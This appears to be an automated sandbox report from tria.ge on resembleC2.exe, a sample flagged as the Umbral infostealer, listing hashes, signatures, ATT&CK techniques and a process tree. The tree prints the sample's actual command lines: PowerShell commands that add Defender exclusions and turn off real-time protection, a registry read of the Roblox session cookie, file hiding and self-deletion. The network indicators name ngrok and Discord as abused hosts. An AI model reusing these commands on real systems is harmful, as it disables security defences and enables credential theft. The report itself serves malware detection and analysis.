Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
125s -
max time network
143s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20241211-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20241211-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
12/01/2025, 05:06
Static task
static1
Behavioral task
behavioral1
Sample
resembleC2.exe
Resource
win10ltsc2021-20241211-en
General
-
Target
resembleC2.exe
-
Size
128KB
-
MD5
4c8044c83f60465eae3cc16d7c858085
-
SHA1
bc837ba36a8f244283483210215a11607f05fb63
-
SHA256
331faea175ced9239aa38c09f75cf1cba4a331461268315b76c94bb7c7a4b8d8
-
SHA512
f4783ae1591dafc44b1731c34dfced82e5285099a4066b6492e063b1ca5edb4a0916fcad0617b38c0fc754c304d932879cf3014bfce83c0b9a7219f8bc737432
-
SSDEEP
3072:oRt4KXzdjBFUxzV4NsFYGvL9JjyVcUuyTRc8R:q4gRjBF4SKFYMLbjxUBRc8
Malware Config
Signatures
-
Detect Umbral payload 2 IoCs
resource yara_rule behavioral1/files/0x00250000000465e4-28.dat family_umbral behavioral1/memory/1528-39-0x000002A70C8E0000-0x000002A70C920000-memory.dmp family_umbral -
Umbral family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 784 powershell.exe 4952 powershell.exe 3940 powershell.exe 2824 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts MoonHub.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1411052346-3904498293-150013998-1000\Control Panel\International\Geo\Nation resembleC2.exe -
Executes dropped EXE 2 IoCs
pid Process 2996 6z2guuz0ldkdgc1o.exe 1528 MoonHub.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 20 0.tcp.eu.ngrok.io 37 discord.com 38 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 15 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2948 PING.EXE 4948 cmd.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 1108 wmic.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1411052346-3904498293-150013998-1000_Classes\Local Settings resembleC2.exe Key created \REGISTRY\USER\S-1-5-21-1411052346-3904498293-150013998-1000_Classes\Local Settings OpenWith.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2948 PING.EXE -
Suspicious behavior: EnumeratesProcesses 33 IoCs
pid Process 4928 wmic.exe 4928 wmic.exe 4928 wmic.exe 4928 wmic.exe 1528 MoonHub.exe 1528 MoonHub.exe 784 powershell.exe 784 powershell.exe 784 powershell.exe 3940 powershell.exe 3940 powershell.exe 3940 powershell.exe 2824 powershell.exe 2824 powershell.exe 2824 powershell.exe 4740 powershell.exe 4740 powershell.exe 4740 powershell.exe 1728 wmic.exe 1728 wmic.exe 1728 wmic.exe 1728 wmic.exe 888 wmic.exe 888 wmic.exe 888 wmic.exe 888 wmic.exe 4952 powershell.exe 4952 powershell.exe 4952 powershell.exe 1108 wmic.exe 1108 wmic.exe 1108 wmic.exe 1108 wmic.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2996 6z2guuz0ldkdgc1o.exe Token: SeDebugPrivilege 1528 MoonHub.exe Token: SeIncreaseQuotaPrivilege 4928 wmic.exe Token: SeSecurityPrivilege 4928 wmic.exe Token: SeTakeOwnershipPrivilege 4928 wmic.exe Token: SeLoadDriverPrivilege 4928 wmic.exe Token: SeSystemProfilePrivilege 4928 wmic.exe Token: SeSystemtimePrivilege 4928 wmic.exe Token: SeProfSingleProcessPrivilege 4928 wmic.exe Token: SeIncBasePriorityPrivilege 4928 wmic.exe Token: SeCreatePagefilePrivilege 4928 wmic.exe Token: SeBackupPrivilege 4928 wmic.exe Token: SeRestorePrivilege 4928 wmic.exe Token: SeShutdownPrivilege 4928 wmic.exe Token: SeDebugPrivilege 4928 wmic.exe Token: SeSystemEnvironmentPrivilege 4928 wmic.exe Token: SeRemoteShutdownPrivilege 4928 wmic.exe Token: SeUndockPrivilege 4928 wmic.exe Token: SeManageVolumePrivilege 4928 wmic.exe Token: 33 4928 wmic.exe Token: 34 4928 wmic.exe Token: 35 4928 wmic.exe Token: 36 4928 wmic.exe Token: SeIncreaseQuotaPrivilege 4928 wmic.exe Token: SeSecurityPrivilege 4928 wmic.exe Token: SeTakeOwnershipPrivilege 4928 wmic.exe Token: SeLoadDriverPrivilege 4928 wmic.exe Token: SeSystemProfilePrivilege 4928 wmic.exe Token: SeSystemtimePrivilege 4928 wmic.exe Token: SeProfSingleProcessPrivilege 4928 wmic.exe Token: SeIncBasePriorityPrivilege 4928 wmic.exe Token: SeCreatePagefilePrivilege 4928 wmic.exe Token: SeBackupPrivilege 4928 wmic.exe Token: SeRestorePrivilege 4928 wmic.exe Token: SeShutdownPrivilege 4928 wmic.exe Token: SeDebugPrivilege 4928 wmic.exe Token: SeSystemEnvironmentPrivilege 4928 wmic.exe Token: SeRemoteShutdownPrivilege 4928 wmic.exe Token: SeUndockPrivilege 4928 wmic.exe Token: SeManageVolumePrivilege 4928 wmic.exe Token: 33 4928 wmic.exe Token: 34 4928 wmic.exe Token: 35 4928 wmic.exe Token: 36 4928 wmic.exe Token: SeDebugPrivilege 784 powershell.exe Token: SeIncreaseQuotaPrivilege 784 powershell.exe Token: SeSecurityPrivilege 784 powershell.exe Token: SeTakeOwnershipPrivilege 784 powershell.exe Token: SeLoadDriverPrivilege 784 powershell.exe Token: SeSystemProfilePrivilege 784 powershell.exe Token: SeSystemtimePrivilege 784 powershell.exe Token: SeProfSingleProcessPrivilege 784 powershell.exe Token: SeIncBasePriorityPrivilege 784 powershell.exe Token: SeCreatePagefilePrivilege 784 powershell.exe Token: SeBackupPrivilege 784 powershell.exe Token: SeRestorePrivilege 784 powershell.exe Token: SeShutdownPrivilege 784 powershell.exe Token: SeDebugPrivilege 784 powershell.exe Token: SeSystemEnvironmentPrivilege 784 powershell.exe Token: SeRemoteShutdownPrivilege 784 powershell.exe Token: SeUndockPrivilege 784 powershell.exe Token: SeManageVolumePrivilege 784 powershell.exe Token: 33 784 powershell.exe Token: 34 784 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 5024 OpenWith.exe -
Suspicious use of WriteProcessMemory 30 IoCs
description pid Process procid_target PID 3820 wrote to memory of 2996 3820 resembleC2.exe 90 PID 3820 wrote to memory of 2996 3820 resembleC2.exe 90 PID 3820 wrote to memory of 1528 3820 resembleC2.exe 93 PID 3820 wrote to memory of 1528 3820 resembleC2.exe 93 PID 1528 wrote to memory of 4928 1528 MoonHub.exe 96 PID 1528 wrote to memory of 4928 1528 MoonHub.exe 96 PID 1528 wrote to memory of 1424 1528 MoonHub.exe 98 PID 1528 wrote to memory of 1424 1528 MoonHub.exe 98 PID 1528 wrote to memory of 784 1528 MoonHub.exe 100 PID 1528 wrote to memory of 784 1528 MoonHub.exe 100 PID 1528 wrote to memory of 3940 1528 MoonHub.exe 105 PID 1528 wrote to memory of 3940 1528 MoonHub.exe 105 PID 1528 wrote to memory of 2824 1528 MoonHub.exe 107 PID 1528 wrote to memory of 2824 1528 MoonHub.exe 107 PID 1528 wrote to memory of 4740 1528 MoonHub.exe 109 PID 1528 wrote to memory of 4740 1528 MoonHub.exe 109 PID 1528 wrote to memory of 1728 1528 MoonHub.exe 112 PID 1528 wrote to memory of 1728 1528 MoonHub.exe 112 PID 1528 wrote to memory of 4280 1528 MoonHub.exe 115 PID 1528 wrote to memory of 4280 1528 MoonHub.exe 115 PID 1528 wrote to memory of 888 1528 MoonHub.exe 118 PID 1528 wrote to memory of 888 1528 MoonHub.exe 118 PID 1528 wrote to memory of 4952 1528 MoonHub.exe 120 PID 1528 wrote to memory of 4952 1528 MoonHub.exe 120 PID 1528 wrote to memory of 1108 1528 MoonHub.exe 122 PID 1528 wrote to memory of 1108 1528 MoonHub.exe 122 PID 1528 wrote to memory of 4948 1528 MoonHub.exe 124 PID 1528 wrote to memory of 4948 1528 MoonHub.exe 124 PID 4948 wrote to memory of 2948 4948 cmd.exe 126 PID 4948 wrote to memory of 2948 4948 cmd.exe 126 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 1424 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\resembleC2.exe"C:\Users\Admin\AppData\Local\Temp\resembleC2.exe"1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3820 -
C:\Users\Admin\AppData\Local\Temp\6z2guuz0ldkdgc1o.exe"C:\Users\Admin\AppData\Local\Temp\6z2guuz0ldkdgc1o.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2996
-
-
C:\Users\Admin\AppData\Local\Temp\MoonHub.exe"C:\Users\Admin\AppData\Local\Temp\MoonHub.exe"2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1528 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4928
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\MoonHub.exe"3⤵
- Views/modifies file attributes
PID:1424
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\MoonHub.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:784
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 23⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3940
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2824
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4740
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1728
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory3⤵PID:4280
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵
- Suspicious behavior: EnumeratesProcesses
PID:888
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4952
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name3⤵
- Detects videocard installed
- Suspicious behavior: EnumeratesProcesses
PID:1108
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\MoonHub.exe" && pause3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:4948 -
C:\Windows\system32\PING.EXEping localhost4⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2948
-
-
-
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5024
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --string-annotations=is-enterprise-managed=no --field-trial-handle=4204,i,4538255413480930743,12957764444767653848,262144 --variations-seed-version --mojo-platform-channel-handle=1324 /prefetch:81⤵PID:1632
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --string-annotations=is-enterprise-managed=no --field-trial-handle=5276,i,4538255413480930743,12957764444767653848,262144 --variations-seed-version --mojo-platform-channel-handle=4160 /prefetch:81⤵PID:3340
Network
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD53eb3833f769dd890afc295b977eab4b4
SHA1e857649b037939602c72ad003e5d3698695f436f
SHA256c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485
SHA512c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72
-
Filesize
1KB
MD5d671caf6268c7434a0c8b4ed72503539
SHA1dbbf7a2caf375efb618fabb60c3cb5c4e9d45916
SHA256130f55cf2d336c55d7650680e06b60a1fb77fe1f7aa9f8b7b1081ec621a5f4c4
SHA5123f581709d1edea3a98d5829f7448d0a05a6f6e71988d096395cf4886f1d4a1ef0c2841d860d6bd445096d4fd99097a135bf6a865a35a323e16b3f0efe9d6db90
-
Filesize
1KB
MD560b3262c3163ee3d466199160b9ed07d
SHA1994ece4ea4e61de0be2fdd580f87e3415f9e1ff6
SHA256e3b30f16d41f94cba2b8a75f35c91ae7418465abfbfe5477ec0551d1952b2fdb
SHA512081d2015cb94477eb0fbc38f44b6d9b4a3204fb3ad0b7d0e146a88ab4ab9a0d475207f1adae03f4a81ccc5beb7568dc8be1249f69e32fe56efd9ee2f6ee3b1af
-
Filesize
948B
MD54359546acae1310d9a8a7c8e58c7adca
SHA15ab2be19efcc2443e12ca714d9bb73943bc2ca6c
SHA256865f30e2e1999202fc5d9917c6a77c0faa430ba0d8e454a2511630c7a3cdbb68
SHA512528e942242886c7f1d20c2efd48cfde452754e6e3755d7ff0faa11daa85c81c82b64bc5e57d7a3ce61bffcce03dc18c8973ecb1ce754e4fb705fda0416d6dc5e
-
Filesize
1KB
MD58e1fdd1b66d2fee9f6a052524d4ddca5
SHA10a9d0994559d1be2eecd8b0d6960540ca627bdb6
SHA2564cc7c1b79d1b48582d4dc27ca8c31457b9bf2441deb7914399bb9e6863f18b13
SHA5125a5494b878b08e8515811ab7a3d68780dac7423f5562477d98249a8bedf7ec98567b7cd5d4c6967d6bc63f2d6d9b7da9a65e0eb29d4b955026b469b5b598d1f3
-
Filesize
45KB
MD58c7d2f0a936dbe6d0899d40171ffb668
SHA10b22fcd904f3b0fa2555a32a2635423668fc4616
SHA25685f5f5acb54c30efd4f84c0f11c834b7dab98c5bb7357bddcd29fbe5babc4db6
SHA512463a48ec2752fd002e82dfe555abd03fc666a523da99e0e848788eeff6f98d06d36a360cfd7ad70d342bb4c90a49131a3428f1404d17e04a7fe5a1022c1faa65
-
Filesize
231KB
MD5f70b5e56a09af292d4e909c547f9c8c0
SHA1577883bdbe8dc9582e15e7a1212b1fe432bafce3
SHA2568fd22c5acb3144dbaa5ab3f9dd5901eb6f3beef67e72ea431246c6a790c067de
SHA512e54ccb56aa6473abd3530493933d5164f2dff02076e0f03443382f02d177a52e318d8d0f432e6a3fb5620eaffd09f2dbf6ccbf9698ba149b149c594fa162d879
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
27KB
MD523f1fabaef532d89fcb6d5bb14a36ef3
SHA1679a82ed172d49f298bf07b6fa0de9b6c2ce0046
SHA256e4410bc67b1ee8af2df456713b85040917b8cf749fb7d660feeb625b25ec9c51
SHA51296e2baa6ce0220b9ad167b60220c683d5b080a9ba9a2e4d320aae6989f4aa2d241f8078e69bdd2da39a20d9b57ae84240da912d29e5e1db36cc90cf6a0537458